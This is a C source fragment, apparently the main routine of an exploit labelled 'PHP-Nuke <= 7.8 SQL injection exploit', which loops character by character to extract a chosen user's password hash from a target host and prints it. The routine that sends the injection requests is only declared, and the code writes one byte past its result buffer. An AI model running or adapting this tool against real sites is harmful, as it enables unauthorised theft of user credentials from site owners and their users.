
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int END ;
 int START ;
 int atoi (char*) ;
 int exit (int) ;
 int found (char*,char*,int,int ,int ,int,int*) ;
 int printf (char*,...) ;
 int sprintf (char*,char*,int) ;
 scalar_t__ strlen (char*) ;

main (int argc, char **argv) {
 int pos;
 int res = 0;
 char result[33];

 if(argc<4)
  {
  printf("Usage %s [host] [/folder/] [user_id]\n",argv[0]);
  exit(1);
  }

 printf("PHP-Nuke <= 7.8 SQL injection exploit\n"
         "-------------------------------------\n"
         "[~] Host : %s\n[~] Folder: %s\n"
         "[!] Searching password for user with id : %d\n"
         "[!] Please wait...\n",argv[1],argv[2],atoi(argv[3]));
 for(pos=1;pos<33;pos++)
  {
  found(argv[1],argv[2],atoi(argv[3]),START,END,pos,&res);
  sprintf(result+pos-1,"%c",res);
  if(res == 0) { break; }
  }
 result[33] = '\0';
 if(strlen(result)>0) printf("[+] Password: %s\n",result);
 else printf("[-] Password not found\n");
 exit (0);
}
